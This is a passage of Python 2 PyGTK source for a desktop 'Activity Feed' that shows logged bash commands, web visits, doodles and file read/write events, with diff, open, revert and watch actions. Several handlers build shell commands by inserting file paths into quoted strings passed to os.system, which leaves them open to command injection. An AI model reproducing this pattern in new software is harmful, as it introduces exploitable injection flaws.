event_header = create_hbox((event_icon, timestamp_lalign), (0, 5))
show_all_local_widgets(locals())
self.timestamp_label = timestamp_lab
self.header = event_header
def get_widget(self):
return self.widget
def update_timestamp(self):
self.timestamp_label.set_markup(FeedEvent.PANGO_TIMESTAMP_TEMPLATE % pretty_date(self.timestamp))
# represents a user-posted comment
class CommentFeedEvent(FeedEvent):
def __init__(self, comment, dt, icon_filename, screenshot_filename=None):
FeedEvent.__init__(self, dt, icon_filename)
self.comment = comment
context_menu = gtk.Menu()
copy_item = gtk.MenuItem('Copy comment')
copy_item.connect("activate", self.copy_comment)
hashtag_item = gtk.MenuItem('Copy event hashtag')
hashtag_item.connect("activate", self.copy_event_hashtag)
context_menu.append(copy_item)
context_menu.append(hashtag_item)
lab = gtk.Label(self.comment)
lab.modify_font(pango.FontDescription("sans 9"))
lab.set_line_wrap(True) # turn on word-wrapping!
lab.set_size_request(WINDOW_WIDTH - 35, -1) # request a reasonable initial width
lab_box = create_clickable_event_box(lab, context_menu)
comment_event_body = create_alignment(lab_box)
comment_vbox = gtk.VBox()
comment_vbox.pack_start(self.header)
if screenshot_filename:
screenshot_link = gtk.Label()
screenshot_link.set_markup('<span font_family="sans" size="9000"><a href="file://%s">View screenshot</a></span>' % screenshot_filename)
screenshot_lalign = create_alignment(screenshot_link, ptop=3)
comment_vbox.pack_start(screenshot_lalign)
comment_vbox.pack_start(comment_event_body, padding=5)
show_all_local_widgets(locals())
self.widget = comment_vbox
self.update_timestamp()
def save_to_db(self):
self.event.save_to_db() # polymorphic!
def copy_comment(self, _ignore):
g_clipboard.set_text(self.comment)
def copy_event_hashtag(self, _ignore):
g_clipboard.set_text(self.event.get_hashtag())
class StatusUpdateFeedEvent(CommentFeedEvent):
def __init__(self, status_update_event):
self.event = status_update_event
CommentFeedEvent.__init__(self, self.event.annotation,
self.event.timestamp,
"accessories-text-editor-24x24.png")
class HappyFaceFeedEvent(CommentFeedEvent):
def __init__(self, happy_face_event):
self.event = happy_face_event
CommentFeedEvent.__init__(self, self.event.annotation,
self.event.timestamp,
"yellow-happy-face-24x24-antialiased.xpm",
self.event.screenshot_filename)
class SadFaceFeedEvent(CommentFeedEvent):
def __init__(self, sad_face_event):
self.event = sad_face_event
CommentFeedEvent.__init__(self, self.event.annotation,
self.event.timestamp,
"red-sad-face-24x24-antialiased.xpm",
self.event.screenshot_filename)
# represents a BASH shell event object in the feed
class BashFeedEvent(FeedEvent):
class BashCommandDisplay:
def __init__(self, bash_cmd_event):
self.bash_cmd_event = bash_cmd_event # BashCommandEvent instance
self.cmd_str = ' '.join(bash_cmd_event.cmd)
self.annotator = AnnotationComponent(WINDOW_WIDTH-50, bash_cmd_event)
command_context_menu = gtk.Menu()
cc_item1 = gtk.MenuItem('Copy command')
cc_item1.connect("activate", self.copy_cmd)
cc_item2 = gtk.MenuItem('Copy event hashtag')
cc_item2.connect("activate", self.copy_event_hashtag)
add_comment_item = gtk.MenuItem('Annotate invocation')
add_comment_item.connect("activate", self.annotator.show_comment_box)
command_context_menu.append(cc_item1)
command_context_menu.append(cc_item2)
command_context_menu.append(add_comment_item)
cmd_label = gtk.Label(self.cmd_str)
cmd_label.modify_font(pango.FontDescription("monospace 8"))
cmd_label_box = create_clickable_event_box(cmd_label, command_context_menu)
cmd_label_box.set_has_tooltip(True)
cmd_label_box.connect('query-tooltip', show_tooltip, self.cmd_str)
cmd_lalign = create_alignment(cmd_label_box, ptop=2, pbottom=2, pleft=2)
cmd_vbox = create_vbox((cmd_lalign, self.annotator.get_widget()))
show_all_local_widgets(locals())
self.widget = cmd_vbox
def copy_cmd(self, _ignore):
g_clipboard.set_text(self.cmd_str)
def copy_event_hashtag(self, _ignore):
g_clipboard.set_text(self.bash_cmd_event.get_hashtag())
def get_widget(self):
return self.widget
def copy_pwd(self, _ignore):
g_clipboard.set_text('cd ' + self.pwd)
def __init__(self, pwd):
FeedEvent.__init__(self, None, "terminal-24x24-icon.png")
self.pwd = pwd
def create_pwd_popup_menu():
menu = gtk.Menu()
item = gtk.MenuItem('Copy directory')
item.connect("activate", self.copy_pwd)
item.show()
menu.append(item)
return menu # don't show() the menu itself; wait for a popup() call
pwd_popup_menu = create_pwd_popup_menu()
pwd_display = gtk.Label()
pwd_display.set_markup('<span underline="single" font_family="monospace" size="9000" foreground="#555555">%s</span>' % prettify_filename(pwd))
pwd_display.set_has_tooltip(True)
pwd_display.connect('query-tooltip', show_tooltip, prettify_filename(pwd))
pwd_display_box = create_clickable_event_box(pwd_display, pwd_popup_menu)
bash_event_body = gtk.VBox()
pwd_valign = create_alignment(pwd_display_box, ptop=3, pbottom=4, pleft=1)
bash_event_body.pack_start(pwd_valign)
bash_vbox = gtk.VBox()
bash_vbox.pack_start(self.header)
bash_vbox.pack_start(bash_event_body)
show_all_local_widgets(locals())
# assign these locals to instance vars after they've been shown ...
self.widget = bash_vbox
self.events_vbox = bash_event_body
self.commands_set = set()
def add_command_chron_order(self, bash_cmd_event):
# since we're presumably inserting in chronological order,
# then update the timestamp when inserting each comment in
# succession, even if it's already in the collection
assert not self.timestamp or bash_cmd_event.timestamp > self.timestamp
self.timestamp = bash_cmd_event.timestamp
self.update_timestamp()
cmd_str = ' '.join(bash_cmd_event.cmd)
# eliminate duplicates
if cmd_str in self.commands_set:
return
self.commands_set.add(cmd_str)
n = BashFeedEvent.BashCommandDisplay(bash_cmd_event)
self.events_vbox.pack_start(n.get_widget(), expand=True)
# represents a webpage visit event object in the feed
class WebpageFeedEvent(FeedEvent):
class WebpageDisplay:
def __init__(self, webpage_event):
self.webpage_event = webpage_event # WebpageVisitEvent instance
self.annotator = AnnotationComponent(WINDOW_WIDTH-50, webpage_event)
webpage_context_menu = gtk.Menu()
hashtag_item = gtk.MenuItem('Copy event hashtag')
hashtag_item.connect("activate", self.copy_event_hashtag)
add_comment_item = gtk.MenuItem('Annotate web visit')
add_comment_item.connect("activate", self.annotator.show_comment_box)
webpage_context_menu.append(hashtag_item)
webpage_context_menu.append(add_comment_item)
# make the domain name concise:
domain_name = urlparse(webpage_event.url).netloc
if domain_name.startswith('www.'):
domain_name = domain_name[len('www.'):]
domain_display = gtk.Label()
domain_display.set_markup('<span font_family="sans" size="8000" foreground="#666666">[%s] </span>' % domain_name)
domain_display_box = create_clickable_event_box(domain_display, webpage_context_menu)
domain_display_box.set_has_tooltip(True)
domain_display_box.connect('query-tooltip', show_tooltip, webpage_event.url)
link_display = gtk.Label()
encoded_url = webpage_event.url.replace('&', '&')
encoded_title = webpage_event.title.replace('&', '&')
link_display.set_markup('<span font_family="sans" size="8000"><a href="%s">%s</a></span>' % (encoded_url, encoded_title))
domain_and_link_display = create_hbox((domain_display_box, link_display))
webpage_display_lalign = create_alignment(domain_and_link_display, ptop=2, pbottom=1, pleft=1)
disp_vbox = create_vbox((webpage_display_lalign, self.annotator.get_widget()))
show_all_local_widgets(locals())
self.widget = disp_vbox
def copy_event_hashtag(self, _ignore):
g_clipboard.set_text(self.webpage_event.get_hashtag())
def get_widget(self):
return self.widget
def __init__(self):
FeedEvent.__init__(self, None, "google-chrome.png")
webpage_event_body = gtk.VBox()
webpage_vbox = gtk.VBox()
webpage_vbox.pack_start(self.header)
webpage_vbox.pack_start(webpage_event_body)
show_all_local_widgets(locals())
self.widget = webpage_vbox
self.webpage_event_body = webpage_event_body
self.stored_URLs = set()
def add_webpage_chron_order(self, webpage_event):
# since we're presumably inserting in chronological order,
# then update the timestamp when inserting each comment in
# succession, even if it's already in the collection
assert not self.timestamp or webpage_event.timestamp >= self.timestamp
self.timestamp = webpage_event.timestamp
self.update_timestamp()
# eliminate dups (but still update timestamp unconditionally)
if webpage_event.url in self.stored_URLs:
return
self.stored_URLs.add(webpage_event.url)
n = WebpageFeedEvent.WebpageDisplay(webpage_event)
self.webpage_event_body.pack_start(n.get_widget())
THUMBNAIL_WIDTH = 250
class DoodleFeedEvent(FeedEvent):
def __init__(self, doodle_event, fvm):
FeedEvent.__init__(self, doodle_event.timestamp, 'mypaint.png')
self.doodle_event = doodle_event # type: DoodleSaveEvent
self.timestamp = doodle_event.timestamp
self.update_timestamp()
self.fvm = fvm
thumbnail = gtk.Image()
thumbnail_lalign = create_alignment(thumbnail, ptop=3, pbottom=4)
thumbnail_event_box = gtk.EventBox()
thumbnail_event_box.add(thumbnail_lalign)
set_white_background(thumbnail_event_box)
thumbnail_event_box.connect('realize',
lambda e:e.window.set_cursor(g_handcursor))
thumbnail_event_box.connect("button_press_event", self.load_fullsize_image)
doodle_vbox = gtk.VBox()
doodle_vbox.pack_start(self.header)
doodle_vbox.pack_start(thumbnail_event_box)
show_all_local_widgets(locals())
self.widget = doodle_vbox
self.thumbnail = thumbnail # don't load the image just yet!
def load_thumbnail(self):
# regular behavior:
if self.doodle_event.filename in sorted_write_events:
# ok, we need to grab the version of the file that existed after
# self.timestamp and BEFORE the next write to that file, since the
# user might have CLOBBERED this doodle image file with newer doodles,
# so self.filename might not be correct (or it could be non-existent!)
filename = self.fvm.checkout_file_before_next_write(self.doodle_event,
sorted_write_events[self.doodle_event.filename])
else:
# if we don't have sorted_write_events, just use the following
# approximation ...
filename = self.fvm.checkout_file(self.doodle_event.filename,
self.doodle_event.timestamp + datetime.timedelta(seconds=5))
assert filename
# resize the doodle down to a respectable size
# http://faq.pygtk.org/index.py?req=show&file=faq08.006.htp
pixbuf = gtk.gdk.pixbuf_new_from_file(filename)
w = pixbuf.get_width()
h = pixbuf.get_height()
if w > THUMBNAIL_WIDTH:
scaled_buf = pixbuf.scale_simple(THUMBNAIL_WIDTH,
int(float(THUMBNAIL_WIDTH) * float(h) / float(w)),
gtk.gdk.INTERP_BILINEAR)
self.thumbnail.set_from_pixbuf(scaled_buf)
else:
self.thumbnail.set_from_file(filename)
self.thumbnail.show()
def load_fullsize_image(self, _ignore, _ignore2):
if self.doodle_event.filename in sorted_write_events:
# dynamically generate the filename since the path might have
# changed (due to new writes ... tricky and subtle!)
filename = self.fvm.checkout_file_before_next_write(self.doodle_event,
sorted_write_events[self.doodle_event.filename])
else:
filename = self.fvm.checkout_file(self.doodle_event.filename,
self.doodle_event.timestamp + datetime.timedelta(seconds=5))
assert filename
os.system('gnome-open "%s" &' % filename)
class FileFeedEvent(FeedEvent):
class FileEventDisplay:
def __init__(self, file_provenance_event, parent):
self.file_provenance_event = file_provenance_event
self.parent = parent # sub-class of FileFeedEvent
self.fvm = parent.fvm # instance of FileVersionManager
self.annotator = AnnotationComponent(WINDOW_WIDTH-50, file_provenance_event)
file_context_menu = gtk.Menu()
diff_cur_item = gtk.MenuItem('Diff against latest')
diff_cur_item.connect("activate", self.diff_with_latest)
diff_pred_item = gtk.MenuItem('Diff against predecessor')
diff_pred_item.connect("activate", self.diff_with_predecessor)
mark_diff = gtk.MenuItem('Select for diff')
mark_diff.connect("activate", self.mark_for_diff)
global diff_menu_items
diff_menu_items.append(mark_diff)
view = gtk.MenuItem('Open')
view.connect("activate", self.open_to_view, 'current')
view_pred = gtk.MenuItem('Open predecessor')
view_pred.connect("activate", self.open_to_view, 'predecessor')
revert_current = gtk.MenuItem('Revert to current')
revert_current.connect("activate", self.revert, 'current')
revert_pred = gtk.MenuItem('Revert to predecessor')
revert_pred.connect("activate", self.revert, 'predecessor')
watch_me = gtk.MenuItem('Watch for changes')
watch_me.connect("activate", self.watch_for_changes)
view_source_prov = gtk.MenuItem('View source file provenance')
view_source_prov.connect("activate", self.view_source_prov)
view_output_prov = gtk.MenuItem('View output file provenance')
view_output_prov.connect("activate", self.view_output_prov)
# not implemented yet
item5 = gtk.MenuItem('Ignore file')
item6 = gtk.MenuItem('Ignore directory')
copy_filename_item = gtk.MenuItem('Copy filename')
copy_filename_item.connect("activate", self.copy_filename)
hashtag_item = gtk.MenuItem('Copy event hashtag')
hashtag_item.connect("activate", self.copy_event_hashtag)
add_comment_item = gtk.MenuItem('Annotate file version')
add_comment_item.connect("activate", self.annotator.show_comment_box)
separator1 = gtk.SeparatorMenuItem()
separator2 = gtk.SeparatorMenuItem()
separator3 = gtk.SeparatorMenuItem()
separator4 = gtk.SeparatorMenuItem()
file_context_menu.append(copy_filename_item)
file_context_menu.append(hashtag_item)
file_context_menu.append(add_comment_item)
file_context_menu.append(separator1)
file_context_menu.append(diff_cur_item)
file_context_menu.append(diff_pred_item)
file_context_menu.append(mark_diff)
file_context_menu.append(separator2)
file_context_menu.append(view)
file_context_menu.append(view_pred)
file_context_menu.append(watch_me)
file_context_menu.append(separator3)
file_context_menu.append(revert_current)
file_context_menu.append(revert_pred)
file_context_menu.append(separator4)
file_context_menu.append(view_source_prov)
file_context_menu.append(view_output_prov)
#file_context_menu.append(item5)
#file_context_menu.append(item6)
# only show base path in label for brevity
file_label = gtk.Label(os.path.basename(self.file_provenance_event.filename))
file_label.modify_font(pango.FontDescription("monospace 8"))
file_label_box = create_clickable_event_box(file_label, file_context_menu)
# ... but show FULL file path in tooltip
file_label_box.set_has_tooltip(True)
file_label_box.connect('query-tooltip', show_tooltip, prettify_filename(self.file_provenance_event.filename))
icon_and_label_box = gtk.HBox()
icon_and_label_box.pack_end(file_label_box, expand=False)
file_lalign = create_alignment(icon_and_label_box, ptop=2, pbottom=2, pleft=2)
file_vbox = create_vbox((file_lalign, self.annotator.get_widget()))
show_all_local_widgets(locals())
self.widget = file_vbox
self.icon_and_label_box = icon_and_label_box
self.watchme_icon_alignment = None # lazily allocate to save memory
global watch_files
try:
old_version_path = watch_files[self.file_provenance_event.filename].checkout_and_get_path()
if os.path.exists(old_version_path):
if not filecmp.cmp(old_version_path, self.file_provenance_event.filename):
# there's a diff!
changed_icon = gtk.Image()
changed_icon.set_from_file('red-exclamation-point-16x16.png')
changed_icon.show()
changed_icon_alignment = create_alignment(changed_icon, pright=3)
changed_icon_alignment.show()
self.icon_and_label_box.pack_end(changed_icon_alignment)
file_label.modify_fg(gtk.STATE_NORMAL, gtk.gdk.Color('#800517')) # make it red!
else:
# 'passed' the informal regression test set by watchfile
test_pass_icon = gtk.Image()
test_pass_icon.set_from_file('tasque-check-box.png')
test_pass_icon.show()
test_pass_icon_alignment = create_alignment(test_pass_icon, pright=3)
test_pass_icon_alignment.show()
self.icon_and_label_box.pack_end(test_pass_icon_alignment)
except KeyError:
pass
def get_widget(self):
return self.widget
def get_filename(self):
return self.file_provenance_event.filename
def copy_filename(self, _ignore):
g_clipboard.set_text(self.file_provenance_event.filename)
def copy_event_hashtag(self, _ignore):
g_clipboard.set_text(self.file_provenance_event.get_hashtag())
def checkout_and_get_path(self):
return self.fvm.checkout_file_before_next_write(self.file_provenance_event,
sorted_write_events[self.file_provenance_event.filename])
# to find the predecessor, simply check out the file one second
# before the write occurred ...
#
# TODO: this isn't exactly correct, since you could've had a bunch
# of coalesced writes, so you might want to get the version BEFORE
# the series of coalesced writes.
def checkout_predecessor_and_get_path(self):
return self.fvm.checkout_file(self.get_filename(),
self.file_provenance_event.timestamp - ONE_SEC)
def diff_with_latest(self, _ignore):
# requires the 'meld' visual diff tool to be installed
old_version_path = self.checkout_and_get_path()
fn = self.file_provenance_event.filename
os.system('meld "%s" "%s" &' % (old_version_path, fn))
def diff_with_predecessor(self, _ignore):
post_write_path = self.checkout_and_get_path()
predecessor_path = self.checkout_predecessor_and_get_path()
os.system('meld "%s" "%s" &' % (predecessor_path, post_write_path))
def mark_for_diff(self, _ignore):
global diff_left_half, diff_menu_items # KLUDGY!
if diff_left_half:
diff_right_half_path = self.checkout_and_get_path()
diff_left_half_path = diff_left_half.checkout_and_get_path()
os.system('meld "%s" "%s" &' % (diff_left_half_path, diff_right_half_path))
# RESET!
diff_left_half = None
for e in diff_menu_items:
e.set_label('Select for diff')
else:
diff_left_half = self
for e in diff_menu_items:
e.set_label('Diff against selected file')
def open_to_view(self, _ignore, option):
if option == 'current':
old_version_path = self.checkout_and_get_path()
elif option == 'predecessor':
old_version_path = self.checkout_predecessor_and_get_path()
else:
assert False
# gnome-open to the rescue!!! uses a file's type to determine the
# proper viewer application :)
if not os.path.isfile(old_version_path):
create_popup_error_dialog("File not found:\n" + old_version_path)
else:
os.system('gnome-open "%s" &' % old_version_path)
def view_source_prov(self, _ignore):
global cur_session
spv = source_file_prov_viewer.SourceFileProvViewer(self.get_filename(), cur_session, self.fvm)
def view_output_prov(self, _ignore):
global cur_session # KLUDGY!
print 'view_output_prov:', self.get_filename(), cur_session
opv = output_file_prov_viewer.OutputFileProvViewer(self.get_filename(), cur_session, self.fvm)
def watch_for_changes(self, _ignore):
global watch_files
fn = self.file_provenance_event.filename
if fn in watch_files:
# un-watch the other file:
other = watch_files[fn]
assert other.watchme_icon_alignment
other.icon_and_label_box.remove(other.watchme_icon_alignment)
# if other is actually self, then un-watch!
if other == self:
del watch_files[fn]
return # PUNTTT!
watch_files[fn] = self
# "freeze" the enclosing FileMutatedFeedEvent object when you
# create a watchpoint so that subsequent writes don't coalesce into
# this FileMutatedFeedEvent entry and possibly destroy the current
# FileEventDisplay object in the # process!
self.parent.frozen = True
watchme_icon = gtk.Image()
watchme_icon.set_from_file('magnifying-glass-16x16.png')
watchme_icon.show()
self.watchme_icon_alignment = create_alignment(watchme_icon, pright=3)
self.watchme_icon_alignment.show()
self.icon_and_label_box.pack_end(self.watchme_icon_alignment)
# option = 'current' or 'predecessor'
def revert(self, _ignore, option):
if option == 'current':
old_version_path = self.checkout_and_get_path()
elif option == 'predecessor':
old_version_path = self.checkout_predecessor_and_get_path()
else:
assert False
if not os.path.isfile(old_version_path):
create_popup_error_dialog("File not found:\n" + old_version_path)
else:
# pop-up a confirmation dialog before taking drastic action!
d = gtk.MessageDialog(None,
gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_QUESTION,
gtk.BUTTONS_YES_NO,
message_format="Are you sure you want to revert\n\n %s\n\nto\n\n %s" % \
(self.get_filename(), old_version_path))
d.show()
response = d.run()
d.destroy()
if response == gtk.RESPONSE_YES:
# VERY INTERESTING: the 'cp' command sometimes doesn't work
# for NILFS, since it thinks that the snapshot version is
# IDENTICAL to the latest current version of the file and will
# thus refuse to do the copy even though their contents are
# clearly different.
#
# Thus, we will do a super-hack where we copy the file to
# tmp_blob and then rename it to the real filename ...
tmp_blob = '/tmp/tmp-reverted-file'
revert_cmd = "cp '%s' '%s'; mv '%s' '%s'" % (old_version_path, tmp_blob,
tmp_blob, self.get_filename())
os.system(revert_cmd)
def revert_all_files_to_pred(self, _ignore):
for v in self.contents.itervalues():
v.revert(None, 'predecessor')
def watch_all_files(self, _ignore):
for v in self.contents.itervalues():
v.watch_for_changes(None)
def __init__(self, process_name, fvm, icon_filename):
FeedEvent.__init__(self, None, icon_filename)
self.process_name = process_name
self.fvm = fvm
self.frozen = False # if frozen, then don't allow any more coalescing into it!
def create_proc_popup_menu():
menu = gtk.Menu()
#item1 = gtk.MenuItem('Ignore process')
revert_all = gtk.MenuItem('Revert all files to predecessors')
revert_all.connect('activate', self.revert_all_files_to_pred)
revert_all.show()
watch_all_files = gtk.MenuItem('Watch all files for changes')
watch_all_files.connect('activate', self.watch_all_files)
watch_all_files.show()
menu.append(watch_all_files)
menu.append(revert_all)
return menu # don't show() the menu itself; wait for a popup() call
proc_display = gtk.Label()
proc_display.set_markup('<span underline="single" font_family="monospace" size="9000" foreground="#555555">%s</span>' % self.process_name)
# Punt on this menu for now ...
proc_popup_menu = create_proc_popup_menu()
proc_display_box = create_clickable_event_box(proc_display, proc_popup_menu)
proc_valign = create_alignment(proc_display_box, ptop=3, pbottom=4, pleft=1)
file_event_body = gtk.VBox()
file_event_body.pack_start(proc_valign)
file_vbox = gtk.VBox()
file_vbox.pack_start(self.header)
file_vbox.pack_start(file_event_body)
show_all_local_widgets(locals())
# assign these locals to instance vars after they've been shown ...
self.widget = file_vbox
self.events_vbox = file_event_body
# Key: filename
# Value: FileFeedEvent.FileEventDisplay object
self.contents = {}
def add_file_evt_chron_order(self, file_provenance_event):
# since we're presumably inserting in chronological order,
# then update the timestamp when inserting each comment in
# succession, even if it's already in the collection
#
# loosened the '>' comparison to '>=' to handle some corner cases:
assert not self.timestamp or file_provenance_event.timestamp >= self.timestamp
self.timestamp = file_provenance_event.timestamp
self.update_timestamp()
fn = file_provenance_event.filename
# de-dup by removing existing widget for this filename (if it exists)
try:
existing_widget = self.contents[fn].get_widget()
self.events_vbox.remove(existing_widget)
except KeyError:
pass
# ALWAYS add the latest entry (so we can have an up-to-date timestamp) ...
n = FileFeedEvent.FileEventDisplay(file_provenance_event, self)
self.contents[fn] = n
self.events_vbox.pack_start(n.get_widget(), expand=True)
# represents a file 'read' event (either a read or the source of a
# rename operation) by a particular process
class FileObservedFeedEvent(FileFeedEvent):
def __init__(self, process_name, fvm):
FileFeedEvent.__init__(self, process_name, fvm, "magnifying-glass.png")
# represents a file-mutated event in the feed (either a write or the
# target of a rename operation), whereby one or more files are being
# mutated by a particular process (either active or exited).
class FileMutatedFeedEvent(FileFeedEvent):
def __init__(self, process_name, fvm):
FileFeedEvent.__init__(self, process_name, fvm, "media-floppy.png")
class BurritoFeed:
def create_status_pane(self):
happy_img = gtk.Image()
happy_img.set_from_file("yellow-happy-face.xpm")
happy_face = gtk.Button()
happy_face.add(happy_img)
happy_face.set_relief(gtk.RELIEF_HALF)
happy_face.connect('clicked', self.happy_face_button_clicked)
sad_img = gtk.Image()
sad_img.set_from_file("red-sad-face.xpm")
sad_face = gtk.Button()
sad_face.add(sad_img)
sad_face.set_relief(gtk.RELIEF_HALF)
sad_face.connect('clicked', self.sad_face_button_clicked)
happy_sad_face_pane = gtk.HBox()
happy_sad_face_pane.pack_start(happy_face, expand=True, fill=True, padding=15)
happy_sad_face_pane.pack_end(sad_face, expand=True, fill=True, padding=15)
su_input = gtk.TextView()
su_input.set_wrap_mode(gtk.WRAP_WORD)
su_input.set_left_margin(3)
su_input.set_right_margin(3)
# add a thin gray border around the text input box:
su_input.set_border_width(1)
su_input.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color('#bbbbbb'))
# I dunno how to set the number of displayed rows, so I just did a
# hack and set the requested size to be something fairly small ...
su_input.set_size_request(0, 50)
sw = gtk.ScrolledWindow()
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
sw.add(su_input)
status_update_pane = gtk.VBox()
status_update_pane.pack_start(sw, padding=3)
su_post_button = gtk.Button(" Post ")
su_post_button.connect('clicked', self.post_button_clicked)
l = gtk.Label("What's on your mind?")
l.set_alignment(0, 0.5)
post_pane = gtk.HBox()
post_pane.pack_start(l, expand=True, fill=True)
post_pane.pack_end(su_post_button, expand=False, fill=False)
status_update_pane.pack_start(post_pane, padding=2)
status_pane = create_vbox((happy_sad_face_pane, status_update_pane), (5, 0))
show_all_local_widgets(locals())
su_input.grab_focus() # do this as late as possible
# kinda impure, but whatever ...
self.status_input = su_input
self.most_recent_status_str = None # to prevent accidental multiple-clicks
return status_pane
def __init__(self, cur_session):
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.connect("destroy", lambda w: gtk.main_quit())
self.cur_session = cur_session # unique session ID
self.window.set_title("Activity Feed")
self.window.set_icon_from_file("yellow-happy-face.xpm")
self.window.set_border_width(5)
vpane = gtk.VBox()
self.window.add(vpane)
self.status_pane = self.create_status_pane()
feed_pane = gtk.ScrolledWindow()
feed_pane.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
feed_vbox = gtk.VBox()
vp = gtk.Viewport()
vp.add(feed_vbox)
vp.set_shadow_type(gtk.SHADOW_NONE)
vp.set_size_request(int((WINDOW_WIDTH * 2.0) / 3), 20) # limit its width
set_white_background(vp)
feed_pane.add(vp)
hs = gtk.HSeparator()
vpane.pack_start(self.status_pane, expand=False, padding=5)
vpane.pack_start(hs, expand=False, padding=3)
vpane.pack_start(feed_pane, expand=True) # fill up the rest of the vbox!
# move window to left side and make it as tall as the desktop
self.window.move(0, 0)
#_w, _h = self.window.get_size()
self.window.resize(WINDOW_WIDTH, self.window.get_screen().get_height())
set_white_background(self.window)
show_all_local_widgets(locals())
self.window.show() # show the window last
self.feed_vbox = feed_vbox
self.feed_events = [] # each element is an instance of a FeedEvent subclass
# MongoDB stuff
c = Connection()
self.db = c.burrito_db
# we want to incrementally update events in a 'sandwiched' time
# range between prev_db_last_updated_time and cur_db_last_updated_time
self.prev_db_last_updated_time = None
self.cur_db_last_updated_time = None
# for making sure we always fetch fresh new FileProvenanceEvent objects
# each elt is the return value from FileProvenanceEvent.get_unique_id()
self.file_events_seen = set()
self.first_time = True
# for managing NILFS file versions:
self.fvm = FileVersionManager()
# returns a list of BashCommandEvent objects
def fetch_new_bash_events(self):
db_bash_collection = self.db.apps.bash
ret = []
if self.prev_db_last_updated_time:
# tricky tricky ... start looking from the PREVIOUS epoch
query = db_bash_collection.find({"session_tag": self.cur_session, "_id":{"$gte":self.prev_db_last_updated_time}})
else:
query = db_bash_collection.find({"session_tag": self.cur_session})
for m in query:
evt = fetch_bash_command_event(m)
if evt:
ret.append(evt)
return ret
# returns a list of WebpageVisitEvent objects
def fetch_new_webpage_events(self):
db_gui_collection = self.db.gui_trace
ret = []
if self.prev_db_last_updated_time:
# tricky tricky ... start looking from the PREVIOUS epoch
query = db_gui_collection.find({"session_tag": self.cur_session, "_id":{"$gte":self.prev_db_last_updated_time}})
else:
query = db_gui_collection.find({"session_tag": self.cur_session})
for m in query:
evt = fetch_webpage_visit_event(m)
if evt:
ret.append(evt)
return ret
# returns a list of FileProvenanceEvent objects
def fetch_new_file_events(self):
db_proc_collection = self.db.process_trace
ret = []
if self.prev_db_last_updated_time:
# tricky tricky ... start looking from the PREVIOUS epoch
query = db_proc_collection.find({"session_tag": self.cur_session,
"most_recent_event_timestamp":{"$gte":self.prev_db_last_updated_time}},
{'pid':1, 'uid':1, 'phases':1})
else:
query = db_proc_collection.find({"session_tag": self.cur_session},
{'pid':1, 'uid':1, 'phases':1})
for m in query:
evts = fetch_file_prov_event_lst(m, self.cur_session)
# de-dup!!!
for e in evts:
e_id = e.get_unique_id()
if e_id not in self.file_events_seen:
ret.append(e)
self.file_events_seen.add(e_id)
return ret
def fetch_new_status_update_events(self):
# ONLY RUN THIS ONCE at the beginning of execution!!!
if self.first_time:
return fetch_toplevel_annotation_events(self.cur_session)
else:
return []
def poll_for_all_event_updates(self):
bash_events = self.fetch_new_bash_events()
web_events = self.fetch_new_webpage_events()
file_events = self.fetch_new_file_events()
status_update_events = self.fetch_new_status_update_events()
db_bash_collection = self.db.apps.bash
print datetime.datetime.now()
print '# bash events:', len(bash_events)
print '# web events:', len(web_events)
print '# file events:', len(file_events)
print '# status events :', len(status_update_events)
print
self.first_time = False
# Now "weave" together all streams of event updates:
all_events = bash_events + web_events + file_events + status_update_events
all_events.sort(key=lambda e:e.timestamp) # chronologically
new_doodle_feed_events = []
last_feed_event = None
for evt in all_events:
if self.feed_events:
last_feed_event = self.feed_events[-1]
if evt.__class__ == BashCommandEvent:
if (last_feed_event and \
last_feed_event.__class__ == BashFeedEvent and \
last_feed_event.pwd == evt.pwd):
last_feed_event.add_command_chron_order(evt)
else:
n = BashFeedEvent(evt.pwd)
n.add_command_chron_order(evt)
self.push_feed_event(n)
elif evt.__class__ == WebpageVisitEvent:
if (last_feed_event and \
last_feed_event.__class__ == WebpageFeedEvent):
last_feed_event.add_webpage_chron_order(evt)
else:
n = WebpageFeedEvent()
n.add_webpage_chron_order(evt)
self.push_feed_event(n)
elif evt.__class__ == DoodleSaveEvent:
# copy-and-paste from FileWriteEvent
if evt.filename in sorted_write_events:
assert sorted_write_events[evt.filename][-1].timestamp < evt.timestamp
else:
sorted_write_events[evt.filename] = []
sorted_write_events[evt.filename].append(evt)
n = DoodleFeedEvent(evt, self.fvm)
self.push_feed_event(n)
new_doodle_feed_events.append(n)
elif evt.__class__ == FileWriteEvent:
if evt.filename in sorted_write_events:
assert sorted_write_events[evt.filename][-1].timestamp <= evt.timestamp
else:
sorted_write_events[evt.filename] = []
sorted_write_events[evt.filename].append(evt)
# First try to coalesce with last_feed_event, regardless of its timestamp ...
# (unless it's frozen)
if (last_feed_event and \
last_feed_event.__class__ == FileMutatedFeedEvent and \
last_feed_event.process_name == evt.phase_name and \
not last_feed_event.frozen):
# except if there's a read barrier!
last_read_time = None
try:
last_read_time = file_read_timestamps[evt.filename]
except KeyError:
pass
if not last_read_time or last_read_time <= evt.timestamp:
last_feed_event.add_file_evt_chron_order(evt)
#print 'C:', evt.phase_name, evt.filename
continue # move along!
# Process coalescing heuristic: try to go back FIVE SECONDS in
# the feed to see if there are any matching events with the same
# process name, and if so, coalesce evt into that process's
# feed entry.
#
# The rationale for this heuristic is that when you're running a
# ./configure or make compile job, there are often several
# related 'friend' processes such as cc1/as, sed/grep/cat, etc.
# that run very quickly back-and-forth, so if you don't
# coalesce, then you would create a TON of separate
# FileMutatedFeedEvent instances, when in fact the multiple
# invocations could be grouped into one instance. e.g., if you
# didn't coalesce, you would get something like:
# [cc1, as, cc1, as, cc1, as, cc1, as, cc1, as ...]
#
# but if you coalesce, you get something much cleaner:
# [cc1, as]
coalesced = False
for cur_feed_elt in gen_reverse_bounded_time_elts(self.feed_events, evt.timestamp - FIVE_SECS):
# VERY IMPORTANT! If there is an intervening read of THIS
# PARTICULAR FILE, then break right away, because we don't want
# to coalesce writes beyond read barriers
try:
last_read_time = file_read_timestamps[evt.filename]
if last_read_time > cur_feed_elt.timestamp:
break
except KeyError:
pass
if (cur_feed_elt.__class__ == FileMutatedFeedEvent and \
cur_feed_elt.process_name == evt.phase_name):
if not cur_feed_elt.frozen:
cur_feed_elt.add_file_evt_chron_order(evt)
coalesced = True
# exit loop after the first FileMutatedFeedEvent regardless
